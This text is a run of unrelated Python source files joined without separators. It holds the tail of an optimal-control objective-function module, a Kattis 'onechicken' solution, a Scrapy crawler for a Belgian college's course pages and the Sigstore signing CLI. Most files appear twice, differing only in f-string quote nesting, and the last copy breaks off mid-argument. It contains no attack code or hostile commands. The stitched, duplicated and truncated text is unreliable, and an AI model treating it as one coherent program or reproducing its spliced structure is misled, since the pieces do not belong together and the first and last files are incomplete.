PenaltyFunctionAbstract._parameter_modifier(penalty_function, parameters) @staticmethod def _span_checker(penalty_function, instant, nlp): """Raises errors on the span of penalty functions""" # Everything that is suspicious in terms of the span of the penalty function ca be checked here PenaltyFunctionAbstract._span_checker(penalty_function, instant, nlp) class MayerFunction(PenaltyFunctionAbstract): """ Mayer type objectives. (value of the objective at one time point, usually the end) """ class Functions: """ Biomechanical objectives """ @staticmethod def minimize_time(penalty, ocp, nlp, t, x, u, p, **extra_param): """Minimizes the duration of the movement (Mayer).""" val = nlp["tf"] ObjectiveFunction.MayerFunction.add_to_penalty(ocp, nlp, val, penalty, **extra_param) @staticmethod def inter_phase_continuity(ocp, pt): # Dynamics must be respected between phases penalty = OptionGeneric() penalty.idx = -1 penalty.quadratic = pt.quadratic penalty.weight = pt.weight pt.base.clear_penalty(ocp, None, penalty) val = pt.type.value[0](ocp, pt) pt.base.add_to_penalty(ocp, None, val, penalty, **pt.params) @staticmethod def add_to_penalty(ocp, nlp, val, penalty, target=None, **extra_param): """ Adds an objective. :param val: Value to be optimized. (MX.sym from CasADi) :param penalty: Index of the objective. (integer) :param weight: Weight of the objective. (float) :param quadratic: If True, value is squared (bool) """ ObjectiveFunction.add_to_penalty(ocp, nlp, val, penalty, dt=1, target=target, **extra_param) # # TODO: This next block is at the wrong place # if nlp: # if quadratic: # # TODO : This seems simply wrong # J_acados_mayer = casadi.dot(nlp["X"][0], nlp["X"][0]) * weight # else: # # TODO : So this is # J_acados_mayer = casadi.sum1(nlp["X"][0]) * weight # nlp["J_acados_mayer"].append(J_acados_mayer) # TODO: Find a better name (J_mayer_from_node_0?) # else: # pass @staticmethod def clear_penalty(ocp, nlp, penalty_idx): """ Resets specified penalty. """ return ObjectiveFunction.clear_penalty(ocp, nlp, penalty_idx) @staticmethod def _parameter_modifier(penalty_function, parameters): """Modification of parameters""" # Everything that should change the entry parameters depending on the penalty can be added here PenaltyFunctionAbstract._parameter_modifier(penalty_function, parameters) @staticmethod def _span_checker(penalty_function, instant, nlp): """Raises errors on the span of penalty functions""" # Everything that is suspicious in terms of the span of the penalty function ca be checked here PenaltyFunctionAbstract._span_checker(penalty_function, instant, nlp) class ParameterFunction(PenaltyFunctionAbstract): """ Mayer type objectives. (value of the objective at one time point, usually the end) """ class Functions: """ Biomechanical objectives """ pass @staticmethod def add_to_penalty(ocp, _, val, penalty, **extra_param): """ Adds an objective. :param val: Value to be optimized. (MX.sym from CasADi) :param penalty: Index of the objective. (integer) :param weight: Weight of the objective. (float) :param quadratic: If True, value is squared (bool) """ ObjectiveFunction.add_to_penalty(ocp, None, val, penalty, dt=1) @staticmethod def clear_penalty(ocp, _, penalty_idx): """ Resets specified penalty. """ return ObjectiveFunction.clear_penalty(ocp, None, penalty_idx) @staticmethod def _parameter_modifier(penalty_function, parameters): """Modification of parameters""" # Everything that should change the entry parameters depending on the penalty can be added here PenaltyFunctionAbstract._parameter_modifier(penalty_function, parameters) @staticmethod def _span_checker(penalty_function, instant, nlp): """Raises errors on the span of penalty functions""" # Everything that is suspicious in terms of the span of the penalty function ca be checked here PenaltyFunctionAbstract._span_checker(penalty_function, instant, nlp) @staticmethod def add_or_replace(ocp, nlp, objective): """ Modifies or raises errors if user provided Instant does not match the objective type. :param objective: New objective to replace with. (dictionary) """ if objective.type.get_type() == ObjectiveFunction.LagrangeFunction: if objective.instant != Instant.ALL and objective.instant != Instant.DEFAULT: raise RuntimeError("Lagrange objective are for Instant.ALL, did you mean Mayer?") objective.instant = Instant.ALL elif objective.type.get_type() == ObjectiveFunction.MayerFunction: if objective.instant == Instant.DEFAULT: objective.instant = Instant.END else: raise RuntimeError("Objective function Type must be either a Lagrange or Mayer type") PenaltyFunctionAbstract.add_or_replace(ocp, nlp, objective) @staticmethod def cyclic(ocp, weight=1): if ocp.nlp[0]["nx"] != ocp.nlp[-1]["nx"]: raise RuntimeError("Cyclic constraint without same nx is not supported yet") ocp.J += ( casadi.dot(ocp.nlp[-1]["X"][-1] - ocp.nlp[0]["X"][0], ocp.nlp[-1]["X"][-1] - ocp.nlp[0]["X"][0]) * weight ) @staticmethod def add_to_penalty(ocp, nlp, val, penalty, dt=0, target=None): """ Adds objective J to objective array nlp["J"][penalty] or ocp.J[penalty] at index penalty. :param J: Objective. (dict of [val, target, weight, is_quadratic]) :param penalty: Index of the objective. (integer) """ val = val target = target if target is not None else None J = {"objective": penalty, "val": val, "target": target, "dt": dt} if nlp: nlp["J"][penalty.idx].append(J) else: ocp.J[penalty.idx].append(J) @staticmethod def clear_penalty(ocp, nlp, penalty): """ Resets specified objective. Negative penalty index leads to enlargement of the array by one empty space. """ if nlp: J_to_add_to = nlp["J"] else: J_to_add_to = ocp.J if penalty.idx < 0: # Add a new one for i, j in enumerate(J_to_add_to): if not j: penalty.idx = i return else: J_to_add_to.append([]) penalty.idx = len(J_to_add_to) - 1 else: while penalty.idx >= len(J_to_add_to): J_to_add_to.append([]) J_to_add_to[penalty.idx] = [] class Objective: class Lagrange(Enum): """ Different conditions between biorbd geometric structures. """ MINIMIZE_TIME = (ObjectiveFunction.LagrangeFunction.Functions.minimize_time,) MINIMIZE_STATE = (PenaltyType.MINIMIZE_STATE,) TRACK_STATE = (PenaltyType.TRACK_STATE,) MINIMIZE_MARKERS = (PenaltyType.MINIMIZE_MARKERS,) TRACK_MARKERS = (PenaltyType.TRACK_MARKERS,) MINIMIZE_MARKERS_DISPLACEMENT = (PenaltyType.MINIMIZE_MARKERS_DISPLACEMENT,) MINIMIZE_MARKERS_VELOCITY = (PenaltyType.MINIMIZE_MARKERS_VELOCITY,) TRACK_MARKERS_VELOCITY = (PenaltyType.TRACK_MARKERS_VELOCITY,) ALIGN_MARKERS = (PenaltyType.ALIGN_MARKERS,) PROPORTIONAL_STATE = (PenaltyType.PROPORTIONAL_STATE,) PROPORTIONAL_CONTROL = (PenaltyType.PROPORTIONAL_CONTROL,) MINIMIZE_TORQUE = (PenaltyType.MINIMIZE_TORQUE,) TRACK_TORQUE = (PenaltyType.TRACK_TORQUE,) MINIMIZE_TORQUE_DERIVATIVE = (PenaltyType.MINIMIZE_TORQUE_DERIVATIVE,) MINIMIZE_MUSCLES_CONTROL = (PenaltyType.MINIMIZE_MUSCLES_CONTROL,) TRACK_MUSCLES_CONTROL = (PenaltyType.TRACK_MUSCLES_CONTROL,) MINIMIZE_ALL_CONTROLS = (PenaltyType.MINIMIZE_ALL_CONTROLS,) TRACK_ALL_CONTROLS = (PenaltyType.TRACK_ALL_CONTROLS,) MINIMIZE_CONTACT_FORCES = (PenaltyType.MINIMIZE_CONTACT_FORCES,) TRACK_CONTACT_FORCES = (PenaltyType.TRACK_CONTACT_FORCES,) ALIGN_SEGMENT_WITH_CUSTOM_RT = (PenaltyType.ALIGN_SEGMENT_WITH_CUSTOM_RT,) ALIGN_MARKER_WITH_SEGMENT_AXIS = (PenaltyType.ALIGN_MARKER_WITH_SEGMENT_AXIS,) CUSTOM = (PenaltyType.CUSTOM,) @staticmethod def get_type(): """Returns the type of the objective function""" return ObjectiveFunction.LagrangeFunction class Mayer(Enum): """ Different conditions between biorbd geometric structures. """ MINIMIZE_TIME = (ObjectiveFunction.MayerFunction.Functions.minimize_time,) MINIMIZE_STATE = (PenaltyType.MINIMIZE_STATE,) TRACK_STATE = (PenaltyType.TRACK_STATE,) MINIMIZE_MARKERS = (PenaltyType.MINIMIZE_MARKERS,) TRACK_MARKERS = (PenaltyType.TRACK_MARKERS,) MINIMIZE_MARKERS_DISPLACEMENT = (PenaltyType.MINIMIZE_MARKERS_DISPLACEMENT,) MINIMIZE_MARKERS_VELOCITY = (PenaltyType.MINIMIZE_MARKERS_VELOCITY,) TRACK_MARKERS_VELOCITY = (PenaltyType.TRACK_MARKERS_VELOCITY,) ALIGN_MARKERS = (PenaltyType.ALIGN_MARKERS,) PROPORTIONAL_STATE = (PenaltyType.PROPORTIONAL_STATE,) PROPORTIONAL_CONTROL = (PenaltyType.PROPORTIONAL_CONTROL,) MINIMIZE_TORQUE = (PenaltyType.MINIMIZE_TORQUE,) TRACK_TORQUE = (PenaltyType.TRACK_TORQUE,) MINIMIZE_MUSCLES_CONTROL = (PenaltyType.MINIMIZE_MUSCLES_CONTROL,) TRACK_MUSCLES_CONTROL = (PenaltyType.TRACK_MUSCLES_CONTROL,) MINIMIZE_ALL_CONTROLS = (PenaltyType.MINIMIZE_ALL_CONTROLS,) TRACK_ALL_CONTROLS = (PenaltyType.TRACK_ALL_CONTROLS,) MINIMIZE_CONTACT_FORCES = (PenaltyType.MINIMIZE_CONTACT_FORCES,) TRACK_CONTACT_FORCES = (PenaltyType.TRACK_CONTACT_FORCES,) MINIMIZE_PREDICTED_COM_HEIGHT = (PenaltyType.MINIMIZE_PREDICTED_COM_HEIGHT,) ALIGN_SEGMENT_WITH_CUSTOM_RT = (PenaltyType.ALIGN_SEGMENT_WITH_CUSTOM_RT,) ALIGN_MARKER_WITH_SEGMENT_AXIS = (PenaltyType.ALIGN_MARKER_WITH_SEGMENT_AXIS,) CUSTOM = (PenaltyType.CUSTOM,) @staticmethod def get_type(): """Returns the type of the objective function""" return ObjectiveFunction.MayerFunction class Parameter(Enum): CUSTOM = (PenaltyType.CUSTOM,) class Analyse: def __init__(self, ocp, sol_obj): self.ocp = ocp self.sol_obj = sol_obj def by_function(self): for idx_phase, phase in enumerate(self.sol_obj): print(f"********** Phase {idx_phase} **********") for idx_obj in range(phase.shape[0]): print( f"{self.ocp.original_values['objective_functions'][idx_phase][idx_phase + idx_obj].type.name} : {np.nansum(phase[idx_obj])}" ) def by_nodes(self): for idx_phase, phase in enumerate(self.sol_obj): print(f"********** Phase {idx_phase} **********") for idx_node in range(phase.shape[1]): print(f"Node {idx_node} : {np.nansum(phase[:, idx_node])}") def mean(self): m = 0 for idx_phase, phase in enumerate(self.sol_obj): m += np.nansum(phase) return m/len(self.sol_obj) @staticmethod def get_objective_values(ocp, sol): def __get_instant(instants, nlp): nodes = [] for node in instants: if isinstance(node, int): if node < 0 or node > nlp["ns"]: raise RuntimeError(f"Invalid instant, {node} must be between 0 and {nlp['ns']}") nodes.append(node) elif node == Instant.START: nodes.append(0) elif node == Instant.MID: if nlp["ns"] % 2 == 1: raise (ValueError("Number of shooting points must be even to use MID")) nodes.append(nlp["ns"] // 2) elif node == Instant.INTERMEDIATES: for i in range(1, nlp["ns"] - 1): nodes.append(i) elif node == Instant.END: nodes.append(nlp["ns"] - 1) elif node == Instant.ALL: for i in range(nlp["ns"]): nodes.append(i) return nodes sol = sol["x"] out = [] for idx_phase, nlp in enumerate(ocp.nlp): nJ = len(nlp["J"]) - idx_phase out.append(np.ndarray((nJ, nlp["ns"]))) out[-1][:][:] = np.nan for idx_obj_func in range(nJ): nodes = __get_instant(nlp["J"][idx_phase + idx_obj_func][0]["objective"].instant, nlp) nodes = nodes[: len(nlp["J"][idx_phase + idx_obj_func])] for node, idx_node in enumerate(nodes): obj = casadi.Function( "obj", [ocp.V], [get_objective_value(nlp["J"][idx_phase + idx_obj_func][node])] ) out[-1][idx_obj_func][idx_node] = obj(sol) return out def get_objective_value(j_dict): val = j_dict["val"] if j_dict["target"] is not None: val -= j_dict["target"] if j_dict["objective"].quadratic: val = dot(val, val) else: val = sum1(val) val *= j_dict["objective"].weight * j_dict["dt"] return val
''' Kattis - onechicken Just do. Time: O(1), Space: O(1) ''' a, b = map(int, input().split()) if b > a: print(f"Dr. Chaz will have {b-a} piece{"s" if b-a > 1 else ""} of chicken left over!") else: print(f"Dr. Chaz needs {a-b} more piece{"s" if a-b > 1 else ""} of chicken!")
''' Kattis - onechicken Just do. Time: O(1), Space: O(1) ''' a, b = map(int, input().split()) if b > a: print(f"Dr. Chaz will have {b-a} piece{'s' if b-a > 1 else ''} of chicken left over!") else: print(f"Dr. Chaz needs {a-b} more piece{'s' if a-b > 1 else ''} of chicken!")
# -*- coding: utf-8 -*- from abc import ABC from pathlib import Path import pandas as pd import scrapy from src.crawl.utils import cleanup from settings import YEAR, CRAWLING_OUTPUT_FOLDER BASE_URl = "http://progcours.hers.be/cocoon/cours/{}.html" PROG_DATA_PATH = Path(__file__).parent.absolute().joinpath( f'../../../../{CRAWLING_OUTPUT_FOLDER}hers_programs_{YEAR}.json') LANGUAGES_DICT = { "Langue française": 'fr', "Langue anglaise": 'en', "Langue allemande": 'de', "Langue néerlandaise": 'nl', "Langue espagnole": 'es' } class HERSCourseSpider(scrapy.Spider, ABC): """ Courses crawler for Haute Ecole Robert Schuman """ # Warning: error on HVAC0001-1, http://progcours.hers.be/cocoon/cours/HVAC0001-1.html name = "hers-courses" custom_settings = { 'FEED_URI': Path(__file__).parent.absolute().joinpath( f'../../../../{CRAWLING_OUTPUT_FOLDER}hers_courses_{YEAR}.json').as_uri() } def start_requests(self): courses_ids = pd.read_json(open(PROG_DATA_PATH, "r"))["courses"] courses_ids_list = sorted(list(set(courses_ids.sum()))) for course_id in courses_ids_list: yield scrapy.Request(BASE_URl.format(course_id), self.parse_main, cb_kwargs={"course_id": course_id}) @staticmethod def parse_main(response, course_id): course_name = response.xpath("////td[@class='LibCours']/text()").get() if course_name is None: yield { "id": course_id, "name": '', "year": f"{YEAR}-{int(YEAR) + 1}", "languages": ["fr"], "teachers": [], "url": response.url, "content": '', "goal": '', "activity": '', "other": '' } years = response.xpath("//div[@id='TitrePrinc']/text()").get().split(" ")[-1] course_rubric_txt = "//div[@class='TitreRubCours' and contains(text(), \"{}\")]" teachers = cleanup(response.xpath(f"{course_rubric_txt.format("prof")}/following::tr[1]//a").getall()) teachers += cleanup(response.xpath(f"{course_rubric_txt.format("Coord")}/following::tr[1]//a").getall()) teachers = [t.replace(" ", '') for t in teachers] teachers = list(set(teachers)) teachers = [" ".join(teacher.split(" ")[1:]) + " " + teacher.split(" ")[0].strip(" ") for teacher in teachers] languages = response.xpath(course_rubric_txt.format("Langue(s)") + "/following::td[2]/text()").getall() languages = [LANGUAGES_DICT[l] for l in languages] languages = ['fr'] if len(languages) == 0 else languages # Cours description def get_sections_text(section_name_prec, section_name_follow): texts = cleanup(response.xpath(f"//tr[preceding::tr[@id='rub_{section_name_prec}'] " f"and following::tr[@id='rub_{section_name_follow}']]").getall()) return '\n'.join(texts).strip("\n") content = get_sections_text('APER', 'OBJT') goal = get_sections_text('OBJT', 'PRER') activity = get_sections_text('TRPR', 'ORGA') yield { 'id': course_id, 'name': course_name, 'year': years, 'languages': languages, 'teachers': teachers, 'url': response.url, 'content': content, 'goal': goal, 'activity': activity, 'other': '' }
# -*- coding: utf-8 -*- from abc import ABC from pathlib import Path import pandas as pd import scrapy from src.crawl.utils import cleanup from settings import YEAR, CRAWLING_OUTPUT_FOLDER BASE_URl = "http://progcours.hers.be/cocoon/cours/{}.html" PROG_DATA_PATH = Path(__file__).parent.absolute().joinpath( f'../../../../{CRAWLING_OUTPUT_FOLDER}hers_programs_{YEAR}.json') LANGUAGES_DICT = { "Langue française": 'fr', "Langue anglaise": 'en', "Langue allemande": 'de', "Langue néerlandaise": 'nl', "Langue espagnole": 'es' } class HERSCourseSpider(scrapy.Spider, ABC): """ Courses crawler for Haute Ecole Robert Schuman """ # Warning: error on HVAC0001-1, http://progcours.hers.be/cocoon/cours/HVAC0001-1.html name = "hers-courses" custom_settings = { 'FEED_URI': Path(__file__).parent.absolute().joinpath( f'../../../../{CRAWLING_OUTPUT_FOLDER}hers_courses_{YEAR}.json').as_uri() } def start_requests(self): courses_ids = pd.read_json(open(PROG_DATA_PATH, "r"))["courses"] courses_ids_list = sorted(list(set(courses_ids.sum()))) for course_id in courses_ids_list: yield scrapy.Request(BASE_URl.format(course_id), self.parse_main, cb_kwargs={"course_id": course_id}) @staticmethod def parse_main(response, course_id): course_name = response.xpath("////td[@class='LibCours']/text()").get() if course_name is None: yield { "id": course_id, "name": '', "year": f"{YEAR}-{int(YEAR) + 1}", "languages": ["fr"], "teachers": [], "url": response.url, "content": '', "goal": '', "activity": '', "other": '' } years = response.xpath("//div[@id='TitrePrinc']/text()").get().split(" ")[-1] course_rubric_txt = "//div[@class='TitreRubCours' and contains(text(), \"{}\")]" teachers = cleanup(response.xpath(f"{course_rubric_txt.format('prof')}/following::tr[1]//a").getall()) teachers += cleanup(response.xpath(f"{course_rubric_txt.format('Coord')}/following::tr[1]//a").getall()) teachers = [t.replace(" ", '') for t in teachers] teachers = list(set(teachers)) teachers = [" ".join(teacher.split(" ")[1:]) + " " + teacher.split(" ")[0].strip(" ") for teacher in teachers] languages = response.xpath(course_rubric_txt.format("Langue(s)") + "/following::td[2]/text()").getall() languages = [LANGUAGES_DICT[l] for l in languages] languages = ['fr'] if len(languages) == 0 else languages # Cours description def get_sections_text(section_name_prec, section_name_follow): texts = cleanup(response.xpath(f"//tr[preceding::tr[@id='rub_{section_name_prec}'] " f"and following::tr[@id='rub_{section_name_follow}']]").getall()) return '\n'.join(texts).strip("\n") content = get_sections_text('APER', 'OBJT') goal = get_sections_text('OBJT', 'PRER') activity = get_sections_text('TRPR', 'ORGA') yield { 'id': course_id, 'name': course_name, 'year': years, 'languages': languages, 'teachers': teachers, 'url': response.url, 'content': content, 'goal': goal, 'activity': activity, 'other': '' }
# Copyright 2022 The Sigstore Authors # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import argparse import logging import os import sys from importlib import resources from pathlib import Path from textwrap import dedent from typing import TextIO, cast from sigstore import __version__ from sigstore._internal.fulcio.client import DEFAULT_FULCIO_URL, FulcioClient from sigstore._internal.oidc.ambient import detect_credential from sigstore._internal.oidc.issuer import Issuer from sigstore._internal.oidc.oauth import ( DEFAULT_OAUTH_ISSUER, STAGING_OAUTH_ISSUER, get_identity_token, ) from sigstore._internal.rekor.client import DEFAULT_REKOR_URL, RekorClient from sigstore._sign import Signer from sigstore._verify import ( CertificateVerificationFailure, VerificationFailure, Verifier, ) logger = logging.getLogger(__name__) logging.basicConfig(level=os.environ.get("SIGSTORE_LOGLEVEL", "INFO").upper()) class _Embedded: """ A repr-wrapper for reading embedded resources, needed to help `argparse` render defaults correctly. """ def __init__(self, name: str) -> None: self._name = name def read(self) -> bytes: return resources.read_binary("sigstore._store", self._name) def __repr__(self) -> str: return f"{self._name} (embedded)" def _parser() -> argparse.ArgumentParser: parser = argparse.ArgumentParser( prog="sigstore", description="a tool for signing and verifying Python package distributions", formatter_class=argparse.ArgumentDefaultsHelpFormatter, ) parser.add_argument( "-V", "--version", action="version", version=f"%(prog)s {__version__}" ) subcommands = parser.add_subparsers(required=True, dest="subcommand") # `sigstore sign` sign = subcommands.add_parser( "sign", formatter_class=argparse.ArgumentDefaultsHelpFormatter ) oidc_options = sign.add_argument_group("OpenID Connect options") oidc_options.add_argument( "--identity-token", metavar="TOKEN", type=str, help="the OIDC identity token to use", ) oidc_options.add_argument( "--oidc-client-id", metavar="ID", type=str, default="sigstore", help="The custom OpenID Connect client ID to use during OAuth2", ) oidc_options.add_argument( "--oidc-client-secret", metavar="SECRET", type=str, help="The custom OpenID Connect client secret to use during OAuth2", ) oidc_options.add_argument( "--oidc-disable-ambient-providers", action="store_true", help="Disable ambient OpenID Connect credential detection (e.g. on GitHub Actions)", ) output_options = sign.add_argument_group("Output options") output_options.add_argument( "--no-default-files", action="store_true", help="Don't emit the default output files ({input}.sig and {input}.crt)", ) output_options.add_argument( "--output-signature", metavar="FILE", type=Path, help=( "Write a single signature to the given file; conflicts with --output and " "does not work with multiple input files" ), ) output_options.add_argument( "--output-certificate", metavar="FILE", type=Path, help=( "Write a single certificate to the given file; conflicts with --output and " "does not work with multiple input files" ), ) output_options.add_argument( "--overwrite", action="store_true", help="Overwrite preexisting signature and certificate outputs, if present", ) instance_options = sign.add_argument_group("Sigstore instance options") instance_options.add_argument( "--fulcio-url", metavar="URL", type=str, default=DEFAULT_FULCIO_URL, help="The Fulcio instance to use (conflicts with --staging)", ) instance_options.add_argument( "--rekor-url", metavar="URL", type=str, default=DEFAULT_REKOR_URL, help="The Rekor instance to use (conflicts with --staging)", ) instance_options.add_argument( "--ctfe", dest="ctfe_pem", metavar="FILE", type=argparse.FileType("rb"), help="A PEM-encoded public key for the CT log (conflicts with --staging)", default=_Embedded("ctfe.pub"), ) instance_options.add_argument( "--rekor-root-pubkey", metavar="FILE", type=argparse.FileType("rb"), help="A PEM-encoded root public key for Rekor itself (conflicts with --staging)", default=_Embedded("rekor.pub"), ) instance_options.add_argument( "--oidc-issuer", metavar="URL", type=str, default=DEFAULT_OAUTH_ISSUER, help="The OpenID Connect issuer to use (conflicts with --staging)", ) instance_options.add_argument( "--staging", action="store_true", help="Use sigstore's staging instances, instead of the default production instances", ) sign.add_argument( "files", metavar="FILE", type=Path, nargs="+", help="The file to sign", ) # `sigstore verify` verify = subcommands.add_parser( "verify", formatter_class=argparse.ArgumentDefaultsHelpFormatter ) input_options = verify.add_argument_group("Verification inputs") input_options.add_argument( "--certificate", "--cert", metavar="FILE", type=Path, help="The PEM-encoded certificate to verify against; not used with multiple inputs", ) input_options.add_argument( "--signature", metavar="FILE", type=Path, help="The signature to verify against; not used with multiple inputs", ) verification_options = verify.add_argument_group("Extended verification options") verification_options.add_argument( "--cert-email", metavar="EMAIL", type=str, help="The email address to check for in the certificate's Subject Alternative Name", ) verification_options.add_argument( "--cert-oidc-issuer", metavar="URL", type=str, help="The OIDC issuer URL to check for in the certificate's OIDC issuer extension", ) instance_options = verify.add_argument_group("Sigstore instance options") instance_options.add_argument( "--rekor-url", metavar="URL", type=str, default=DEFAULT_REKOR_URL, help="The Rekor instance to use (conflicts with --staging)", ) instance_options.add_argument( "--staging", action="store_true", help="Use sigstore's staging instances, instead of the default production instances", ) verify.add_argument( "files", metavar="FILE", type=Path, nargs="+", help="The file to verify", ) return parser def main() -> None: parser = _parser() args = parser.parse_args() logger.debug(f"parsed arguments {args}") # Stuff the parser back into our namespace, so that we can use it for # error handling later. args._parser = parser if args.subcommand == "sign": _sign(args) elif args.subcommand == "verify": _verify(args) else: parser.error(f"Unknown subcommand: {args.subcommand}") def _sign(args: argparse.Namespace) -> None: # `--no-default-files` has no effect on `--output-{signature,certificate}`, # but we forbid it because it indicates user confusion. if args.no_default_files and (args.output_signature or args.output_certificate): args._parser.error( "--no-default-files may not be combined with " "--output-signature or --output-certificate", ) # Fail if `--output-signature` or `--output-certificate` is specified # *and* we have more than one input. if (args.output_signature or args.output_certificate) and len(args.files) > 1: args._parser.error( "Error: --output-signature and --output-certificate can't be used with " "explicit outputs for multiple inputs; consider using --output", ) # Build up the map of inputs -> outputs ahead of any signing operations, # so that we can fail early if overwriting without `--overwrite`. output_map = {} for file in args.files: if not file.is_file(): args._parser.error(f"Input must be a file: {file}") sig, cert = args.output_signature, args.output_certificate if not sig and not cert and not args.no_default_files: sig = file.parent / f"{file.name}.sig" cert = file.parent / f"{file.name}.crt" if not args.overwrite: extants = [] if sig and sig.exists(): extants.append(str(sig)) if cert and cert.exists(): extants.append(str(cert)) if extants: args._parser.error( "Refusing to overwrite outputs without --overwrite: " f"{", ".join(extants)}" ) output_map[file] = {"cert": cert, "sig": sig} # Select the signer to use. if args.staging: logger.debug("sign: staging instances requested") signer = Signer.staging() args.oidc_issuer = STAGING_OAUTH_ISSUER elif args.fulcio_url == DEFAULT_FULCIO_URL and args.rekor_url == DEFAULT_REKOR_URL: signer = Signer.production() else: signer = Signer( fulcio=FulcioClient(args.fulcio_url), rekor=RekorClient( args.rekor_url, args.rekor_root_pubkey.read(), args.ctfe_pem.read() ), ) # The order of precedence is as follows: # # 1) Explicitly supplied identity token # 2) Ambient credential detected in the environment, unless disabled # 3) Interactive OAuth flow if not args.identity_token and not args.oidc_disable_ambient_providers: args.identity_token = detect_credential() if not args.identity_token: issuer = Issuer(args.oidc_issuer) if args.oidc_client_secret is None: args.oidc_client_secret = "" # nosec: B105 args.identity_token = get_identity_token( args.oidc_client_id, args.oidc_client_secret, issuer, ) if not args.identity_token: args._parser.error("No identity token supplied or detected!") for file, outputs in output_map.items(): logger.debug(f"signing for {file.name}") result = signer.sign( input_=file.read_bytes(), identity_token=args.identity_token, ) print("Using ephemeral certificate:") print(result.cert_pem) print(f"Transparency log entry created at index: {result.log_entry.log_index}") sig_output: TextIO if outputs["sig"]: sig_output = outputs["sig"].open("w") else: sig_output = sys.stdout print(result.b64_signature, file=sig_output) if outputs["sig"]: print(f"Signature written to file {outputs["sig"]}") if outputs["cert"] is not None: cert_output = open(outputs["cert"], "w") print(result.cert_pem, file=cert_output) print(f"Certificate written to file {outputs["cert"]}") def _verify(args: argparse.Namespace) -> None: # Fail if `--certificate` or `--signature` is specified and we have more than one input. if (args.certificate or args.signature) and len(args.files) > 1: args._parser.error( "--certificate and --signature can only be used with a single input file" ) # The converse of `sign`: we build up an expected input map and check # that we have everything so that we can fail early. input_map = {} for file in args.files: if not file.is_file(): args._parser.error(f"Input must be a file: {file}") sig, cert = args.signature, args.certificate if sig is None: sig = file.parent / f"{file.name}.sig" if cert is None: cert = file.parent / f"{file.name}.crt" missing = [] if not sig.is_file(): missing.append(str(sig)) if not cert.is_file(): missing.append(str(cert)) if missing: args._parser.error( f"Missing verification materials for {(file)}: {", ".join(missing)}" ) input_map[file] = {"cert": cert, "sig": sig} if args.staging: logger.debug("verify: staging instances requested") verifier = Verifier.staging() elif args.rekor_url == DEFAULT_REKOR_URL: verifier = Verifier.production() else: # TODO: We need CLI flags that allow the user to figure the Fulcio cert chain # for verification. args._parser.error( "Custom Rekor and Fulcio configuration for verification isn't fully supported yet!", ) for file, inputs in input_map.items(): # Load the signing certificate logger.debug(f"Using certificate from: {inputs["cert"]}") certificate = inputs["cert"].read_bytes() # Load the signature logger.debug(f"Using signature from: {inputs["sig"]}") signature = inputs["sig"].read_bytes() logger.debug(f"Verifying contents from: {file}") result = verifier.verify( input_=file.read_bytes(), certificate=certificate, signature=signature, expected_cert_email=args.cert_email, expected_cert_oidc_issuer=args.cert_oidc_issuer, ) if result: print(f"OK: {file}") else: result = cast(VerificationFailure, result) print(f"FAIL: {file}") print(f"Failure reason: {result.reason}", file=sys.stderr) if isinstance(result, CertificateVerificationFailure): # If certificate verification failed, it's either because of # a chain issue or some outdated state in sigstore itself. # These might already be resolved in a newer version, so # we suggest that users try to upgrade and retry before # anything else. print( dedent( f""" This may be a result of an outdated `sigstore` installation. Consider upgrading with: python -m pip install --upgrade sigstore Additional context: {result.exception} """ ), file=sys.stderr, ) sys.exit(1)
# Copyright 2022 The Sigstore Authors # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import argparse import logging import os import sys from importlib import resources from pathlib import Path from textwrap import dedent from typing import TextIO, cast from sigstore import __version__ from sigstore._internal.fulcio.client import DEFAULT_FULCIO_URL, FulcioClient from sigstore._internal.oidc.ambient import detect_credential from sigstore._internal.oidc.issuer import Issuer from sigstore._internal.oidc.oauth import ( DEFAULT_OAUTH_ISSUER, STAGING_OAUTH_ISSUER, get_identity_token, ) from sigstore._internal.rekor.client import DEFAULT_REKOR_URL, RekorClient from sigstore._sign import Signer from sigstore._verify import ( CertificateVerificationFailure, VerificationFailure, Verifier, ) logger = logging.getLogger(__name__) logging.basicConfig(level=os.environ.get("SIGSTORE_LOGLEVEL", "INFO").upper()) class _Embedded: """ A repr-wrapper for reading embedded resources, needed to help `argparse` render defaults correctly. """ def __init__(self, name: str) -> None: self._name = name def read(self) -> bytes: return resources.read_binary("sigstore._store", self._name) def __repr__(self) -> str: return f"{self._name} (embedded)" def _parser() -> argparse.ArgumentParser: parser = argparse.ArgumentParser( prog="sigstore", description="a tool for signing and verifying Python package distributions", formatter_class=argparse.ArgumentDefaultsHelpFormatter, ) parser.add_argument( "-V", "--version", action="version", version=f"%(prog)s {__version__}" ) subcommands = parser.add_subparsers(required=True, dest="subcommand") # `sigstore sign` sign = subcommands.add_parser( "sign", formatter_class=argparse.ArgumentDefaultsHelpFormatter ) oidc_options = sign.add_argument_group("OpenID Connect options") oidc_options.add_argument( "--identity-token", metavar="TOKEN", type=str, help="the OIDC identity token to use", ) oidc_options.add_argument( "--oidc-client-id", metavar="ID", type=str, default="sigstore", help="The custom OpenID Connect client ID to use during OAuth2", ) oidc_options.add_argument( "--oidc-client-secret", metavar="SECRET", type=str, help="The custom OpenID Connect client secret to use during OAuth2", ) oidc_options.add_argument( "--oidc-disable-ambient-providers", action="store_true", help="Disable ambient OpenID Connect credential detection (e.g. on GitHub Actions)", ) output_options = sign.add_argument_group("Output options") output_options.add_argument( "--no-default-files", action="store_true", help="Don't emit the default output files ({input}.sig and {input}.crt)", ) output_options.add_argument( "--output-signature", metavar="FILE", type=Path, help=( "Write a single signature to the given file; conflicts with --output and " "does not work with multiple input files" ), ) output_options.add_argument( "--output-certificate", metavar="FILE", type=Path, help=( "Write a single certificate to the given file; conflicts with --output and " "does not work with multiple input files" ), ) output_options.add_argument( "--overwrite", action="store_true", help="Overwrite preexisting signature and certificate outputs, if present", ) instance_options = sign.add_argument_group("Sigstore instance options") instance_options.add_argument( "--fulcio-url", metavar="URL", type=str, default=DEFAULT_FULCIO_URL, help="The Fulcio instance to use (conflicts with --staging)", ) instance_options.add_argument( "--rekor-url", 